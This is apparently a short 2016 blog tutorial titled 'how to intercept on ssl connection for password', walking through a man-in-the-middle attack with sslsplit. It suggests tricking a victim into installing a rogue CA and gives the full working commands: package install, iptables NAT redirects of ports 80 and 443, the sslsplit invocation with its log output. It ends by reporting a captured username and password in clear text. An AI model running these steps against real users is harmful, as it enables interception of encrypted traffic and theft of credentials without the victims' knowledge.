Tuesday, September 27, 2016

how to intercept on ssl connection for password

sslsplit in tool that is used in man in the middle mitm attack against the ssl connection, so it can intercept the traffic as clear text. but to be able to, 1, user have to be not so careful and does not know much about computer, 2, you have privilege access to client's computer to install ca, 3- or you have tricked client to install your ca before hand.

1- diagram

client --> sslsplit --> https server (phpmyadmin)

- follow the link below to setup https for phpmyadmin
http://www.atechnote.com/2016/09/enable-ssl-on-phpmyadmin.html

- follow step 1 and step 2 of the link above to generate another pair of key and crt and copy it to sslsplit pc

2- install sslsplit package
$ sudo apt-get install sslsplit

3- create a directory for the operation
$ mkdir sslsplit/logs -p && cd sslsplit
- assume you have generate certificate and keys on the step 1, then copy it to the directory ~/sslsplit

so the sslsplit directory should contains the following files and directory
$ ls ~/sslsplit
ca.crt  ca.key  log 

4- configure nat to direct traffic to sslsplit
$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -F
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
$ sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443


5- run sslsplit and wait client to access the site
$ sslsplit -D -l connections.log -S logs -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
Generated RSA key for leaf certs.
SSLsplit 0.4.11 (built 2015-11-23)
Copyright (c) 2009-2014, Daniel Roethlisberger <daniel@roe.ch>
http://www.roe.ch/SSLsplit
Build info: V:FILE
Features: -DHAVE_NETFILTER
NAT engines: netfilter* tproxy
netfilter: IP_TRANSPARENT SOL_IPV6 !IPV6_ORIGINAL_DST
Local process info support: no
compiled against OpenSSL 1.0.2d 9 Jul 2015 (1000204f)
rtlinked against OpenSSL 1.0.2g  1 Mar 2016 (1000207f)
TLS Server Name Indication (SNI) supported
OpenSSL is thread-safe with THREADID
Using SSL_MODE_RELEASE_BUFFERS
SSL/TLS protocol availability: ssl3 tls10 tls11 tls12
SSL/TLS algorithm availability: RSA DSA ECDSA DH ECDH EC
OpenSSL option availability: SSL_OP_NO_COMPRESSION SSL_OP_NO_TICKET SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION SSL_OP_TLS_ROLLBACK_BUG
compiled against libevent 2.0.21-stable
rtlinked against libevent 2.0.21-stable
1 CPU cores detected
SSL/TLS protocol: negotiate
proxyspecs:
- [0.0.0.0]:8080 tcp plain netfilter
- [0.0.0.0]:8443 ssl plain netfilter
Loaded CA: '/C=US/ST=CA/L=Sancisco/O=Founston/OU=MtionalUnit/CN=Founston CA/name=EasyRSA/emailAddress=ssme@myhost.mydomain'
Using libevent backend 'epoll'
Event base supports: edge yes, O(1) yes, anyfd no
Inserted events:
  0x13eb890 [fd 7] Read Persist
  0x13ecd20 [fd 8] Read Persist
  0x13ecde0 [fd 9] Read Persist
  0x13eb6c8 [fd 6] Read Persist
  0x13ebdc0 [fd 3] Signal Persist
  0x13ec000 [fd 1] Signal Persist
  0x13ec130 [fd 2] Signal Persist
  0x13ec260 [fd 13] Signal Persist
Initialized 2 connection handling threads
Started 2 connection handling threads
Starting main event loop.


6- after client access the site the logs will generate into directory ~/sslsplit/logs

and inside one of the logs, we can see the password and username in clear text,

- snapshot of username root and password password1 produce by sslsplit when client login  https website

No comments:

Post a Comment